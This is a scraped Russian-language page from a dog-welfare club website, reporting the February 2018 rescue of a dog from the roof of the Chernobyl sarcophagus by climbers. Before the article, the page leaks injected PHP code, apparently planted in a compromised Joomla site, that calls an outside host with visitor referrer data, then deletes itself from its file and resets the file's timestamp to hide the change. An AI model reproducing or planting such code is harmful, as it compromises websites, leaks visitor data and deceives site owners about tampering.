check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456755828){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776972&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/views.php"); } Операция по спасению собаки с крыши саркофага в Чернобыле
 

РКФ Новый век

Мы в ответе за тех, кого приручили.

  • Увеличить размер шрифта
  • Размер шрифта по умолчанию
  • Уменьшить размер шрифта
Home Интересные новости Операция по спасению собаки с крыши саркофага в Чернобыле

Операция по спасению собаки с крыши саркофага в Чернобыле

E-mail Печать PDF
>[ Видео в конце новости ]

Польский путешественник и член фонда Clean Futures Лукаш Завадски (ukasz Zawadzki) опубликовал ролик со спасением собаки с крыши саркофага в Чернобыле. Он рассказал, что это произошло в феврале 2018 года во время его визита в зону отчуждения. Как сообщает Tjournal, для этого рабочим пришлось подняться на высоту почти 100 метров в специальном альпинистском снаряжении. А вот как туда забралась собака, неясно.

Животное оказалось на саркофаге «Укрытие-2», который закрывает разрушенный во время аварии четвёртый энергоблок АЭС. По словам Лукаша, ей на выручку пришли трое рабочих, у которых было альпинистское снаряжение. Они закрепили собаку спасательными ремнями и вместе с ней спустились на землю.

Clean Futures — некоммерческий фонд, который уже несколько лет занимается спасением бездомных собак в зоне Чернобыльской АЭС, а также выступает за стерилизацию животных для контроля популяции и защиты рабочих от постоянных нападений.




Источник http://daylapu.ru/news.php?ngod=2018&news=8
 

Добавить комментарий


Защитный код
Обновить

Пользовательский поиск



Случайное изображение.

  .jpg

Реклама